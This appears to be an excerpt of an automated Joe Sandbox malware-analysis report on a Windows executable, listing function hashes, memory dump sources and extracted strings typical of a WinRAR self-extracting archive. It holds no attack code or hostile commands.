                                                                    • Opcode ID: b080e87118f04f16fc44de2e1f07be042694fa9f1456133e620114afb5815e81
                                                                    • Instruction ID: 0d804e99a19849773ed2ddb442e70f7fb56d51495c4968ffeb128d61c4c01694
                                                                    • Opcode Fuzzy Hash: b080e87118f04f16fc44de2e1f07be042694fa9f1456133e620114afb5815e81
                                                                    • Instruction Fuzzy Hash: DAB1EFA2B04BC9A2DF18EA66D6087E9A391B744FC4F989036DE1D0B740EFBCE555D310
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6472486f99e2931273e545462403043f1bf9b0b2859d16c20765bc74e3144e89
                                                                    • Instruction ID: bd7808e52bc9d66d146ec5d5b09db7bc5c81a253ad1aa83ed45eb5914fb32eef
                                                                    • Opcode Fuzzy Hash: 6472486f99e2931273e545462403043f1bf9b0b2859d16c20765bc74e3144e89
                                                                    • Instruction Fuzzy Hash: 22C1ABB7B282908FE350CF7AE400A9D7BB1F39878CB519125DF59A3B09D679E605CB40
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d136bca7deb9820811996b1a273c16c67381898c9c8c0d7b5743e702d501d639
                                                                    • Instruction ID: 1883575c490f32bd7fe27492f40de7f3da15bf6027bc09a097d8adb74d75cd23
                                                                    • Opcode Fuzzy Hash: d136bca7deb9820811996b1a273c16c67381898c9c8c0d7b5743e702d501d639
                                                                    • Instruction Fuzzy Hash: 45A1A873E0819262EB51FA24D4447FDF791EB98744FA54134DA8E07B82EEBCE841E360
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: da4b5c93971cda1c30e5eee4be8d9e04c4b4a48383b2ec9a90131c9e461bfd7c
                                                                    • Instruction ID: 6384670ec921cfa9822c1022b2a7a687f0dafaf09253a9bcebbc9a8ac67e526f
                                                                    • Opcode Fuzzy Hash: da4b5c93971cda1c30e5eee4be8d9e04c4b4a48383b2ec9a90131c9e461bfd7c
                                                                    • Instruction Fuzzy Hash: 25C1F673E291E04DE302CBB5A4648FD3FF1E71E34DB4A4152EFA656B4AD5289201DF60
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc
                                                                    • String ID:
                                                                    • API String ID: 190572456-0
                                                                    • Opcode ID: b509a7b9623e828e2f94f36bf10b171de2d5eb00cb1ca025cb199c8348f6ee71
                                                                    • Instruction ID: ba0eeacf90d7fd4a336f3c398818747d40cfb4e40e4eafcfafa23dc6d4c32729
                                                                    • Opcode Fuzzy Hash: b509a7b9623e828e2f94f36bf10b171de2d5eb00cb1ca025cb199c8348f6ee71
                                                                    • Instruction Fuzzy Hash: 6B913462F18581A6EB11EF29D4503FDA760FF95B88F942031EF4E07A49EEB9D646C310
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ad0df4841f270bcfaeccc73dae356be3e63ef9d514f613fc5c919404c1519221
                                                                    • Instruction ID: 3453c83d74e4d900342d19fc0874e22bd914637c66ed0aa70b07813758b8215c
                                                                    • Opcode Fuzzy Hash: ad0df4841f270bcfaeccc73dae356be3e63ef9d514f613fc5c919404c1519221
                                                                    • Instruction Fuzzy Hash: 93814623F18691A5EB10EB26D8407EEE7A4FB84788F941032DE4D07B99DFB9D905D710
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 037c072c8f69c730398842e9f14e44372f2237b347c4ac58ad4ad4a902201b6b
                                                                    • Instruction ID: e6c0188340a55ac76d9039abbb4aae523d93b3c9d9a20e4af54a824e6468a055
                                                                    • Opcode Fuzzy Hash: 037c072c8f69c730398842e9f14e44372f2237b347c4ac58ad4ad4a902201b6b
                                                                    • Instruction Fuzzy Hash: D5615623F181D569EB01DF7485405FEBFB1E709788B994032CEAA63A46DA7CE105EB30
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b4229b7833cb0a742bbdc932db99760edf63482b3b6f62e8612c8a0675b4b6c2
                                                                    • Instruction ID: 006be273ca1370a1e5c901c74f66573222166f298a790cc9c877b888bb14853b
                                                                    • Opcode Fuzzy Hash: b4229b7833cb0a742bbdc932db99760edf63482b3b6f62e8612c8a0675b4b6c2
                                                                    • Instruction Fuzzy Hash: 90518673F184515BE3589F28D4087BCB351F788B58FA44230CB8947A88EE7DE901EB10
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 123e4387f8d9ae5451c15e5b2be3a6a791da4299fc8242df495a927e0fa62112
                                                                    • Instruction ID: 7b594f364a2753e93ec19dd4f648d2a3b8b298c31d0df3f452051a78b2da4e43
                                                                    • Opcode Fuzzy Hash: 123e4387f8d9ae5451c15e5b2be3a6a791da4299fc8242df495a927e0fa62112
                                                                    • Instruction Fuzzy Hash: 8B3128B2E085816BD758EE16D9913BEB7D0F744784F508038DB8683F41DA7CE445D710
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c301e110b5bfde31e548f7e504ad4167112c0d1c37f03b0bb4904797d209faef
                                                                    • Instruction ID: e765c265e309c75cc48315b1e4a3088021ccaf01c19ecb8a63eab5666d41adf0
                                                                    • Opcode Fuzzy Hash: c301e110b5bfde31e548f7e504ad4167112c0d1c37f03b0bb4904797d209faef
                                                                    • Instruction Fuzzy Hash: 48F06272B186959BDBA4EF29A842629B7D0F708380F958039DA8D83B04D67C90609F14
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7c35f8b18c1a0bfada156a295f3d949bbcba5d0e46cbbf7311c51e14de01b873
                                                                    • Instruction ID: 36349dce48f73e37fdc52275a65dccb285bae4f25b0c20f8730d3648c5457991
                                                                    • Opcode Fuzzy Hash: 7c35f8b18c1a0bfada156a295f3d949bbcba5d0e46cbbf7311c51e14de01b873
                                                                    • Instruction Fuzzy Hash: 50A00161D09842E0E745AB40A8A1060A320BB50B00BA09531E40D810A5DEACA810E260
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                    • String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
                                                                    • API String ID: 3668304517-727060406
                                                                    • Opcode ID: df969facf24a54bd4a4c61cb6c3becc837b8ce778cf416acdee48feaf039601d
                                                                    • Instruction ID: 7f9ada277f98a63cdaab47c2cfc249e997f00f41c3f9a309e38886a858e062cb
                                                                    • Opcode Fuzzy Hash: df969facf24a54bd4a4c61cb6c3becc837b8ce778cf416acdee48feaf039601d
                                                                    • Instruction Fuzzy Hash: D1410876F05B01A9EB00EF60E8403E973A5FB48794FA04536DA4C43B59EEB8D155D354
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                    • API String ID: 2565136772-3242537097
                                                                    • Opcode ID: fdee9745a353db95c9b4b27806cffd46c0390e42e013dce2f99bb91082c79cfb
                                                                    • Instruction ID: 1f1874c078e45d069f963ad9abcf1e07e92cec85391c74ae7df0b639e52e9411
                                                                    • Opcode Fuzzy Hash: fdee9745a353db95c9b4b27806cffd46c0390e42e013dce2f99bb91082c79cfb
                                                                    • Instruction Fuzzy Hash: CE214C20E0AA03B1FB15FB60E865175A3A0BF48B80FE44434C90E426A0DFBCA855A320
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                    • String ID: DXGIDebug.dll$UNC$\\?\
                                                                    • API String ID: 4097890229-4048004291
                                                                    • Opcode ID: bfc30a2d9763371fa05dc3689b9f97feb0316accffdd2e59997247909b7df4a9
                                                                    • Instruction ID: a5c3ac1b7bf9e6a9823ae33bbdfc2a3b305edc03688e319b43002049f1ebaf6b
                                                                    • Opcode Fuzzy Hash: bfc30a2d9763371fa05dc3689b9f97feb0316accffdd2e59997247909b7df4a9
                                                                    • Instruction Fuzzy Hash: 3F12D122F08B46A4EB10EB69D4841ADA371FB81B88FA04136DB5D07EE9DFBCD546D350
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                                                                    • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                    • API String ID: 431506467-1315819833
                                                                    • Opcode ID: b078900cb13599d62c0801072d2a32f62caee5a0f070c48cbb4a346a8e4dbcf7
                                                                    • Instruction ID: 579e96d7ecc1b88683c97a37c1cc2d7e5f7531449bd324f6ed405b47c29c20d2
                                                                    • Opcode Fuzzy Hash: b078900cb13599d62c0801072d2a32f62caee5a0f070c48cbb4a346a8e4dbcf7
                                                                    • Instruction Fuzzy Hash: A9B1D462F08B82A5FB00EB74D4442BCA372EB84794FA05235DE1C26AD9EFBCE555D350
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Global$AllocCreateStream
                                                                    • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                    • API String ID: 2868844859-1533471033
                                                                    • Opcode ID: c260321460ef5b9ecb46faae32cf6e49ce157a8f6490be7222d78fb8d8663caa
                                                                    • Instruction ID: dd3ce80af190de66af83955c14fcd5d0571cbccc84cedeee5f899231bd16f27c
                                                                    • Opcode Fuzzy Hash: c260321460ef5b9ecb46faae32cf6e49ce157a8f6490be7222d78fb8d8663caa
                                                                    • Instruction Fuzzy Hash: 2081D062F08B42A5FB00EBB5D8402ECA371AF44B94FE04535CE1D176DAEEB8E506D320
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                    • API String ID: 3215553584-2617248754
                                                                    • Opcode ID: a60231409e47c1a5672abfa229f1b0c42138c6649af1949bad2eb6332146811d
                                                                    • Instruction ID: 2949ca4d58b225afdeec01dd7777e3869fba28ae4e97b476352ab4f2106aa6ea
                                                                    • Opcode Fuzzy Hash: a60231409e47c1a5672abfa229f1b0c42138c6649af1949bad2eb6332146811d
                                                                    • Instruction Fuzzy Hash: 5D41BA32E09B85A9F701DF25E8417ED73A4EB08398FA04936EE9C47B84DE78D425C394
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageObjectSend$ClassDeleteLongName
                                                                    • String ID: STATIC
                                                                    • API String ID: 2845197485-1882779555
                                                                    • Opcode ID: 0a32551ddf3b327544de21b3e538b695597bcc4fc0cc33eb1cc93d7c3056c0d2
                                                                    • Instruction ID: 008de5dab755d0469b84d860233cc564c7baaa3518c54df922f554b0d224eb7e
                                                                    • Opcode Fuzzy Hash: 0a32551ddf3b327544de21b3e538b695597bcc4fc0cc33eb1cc93d7c3056c0d2
                                                                    • Instruction Fuzzy Hash: 7331B426F0864296FB60BB12A5547B9A391BF89BD0FE40430DD4D07B55EEBCE502A760
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
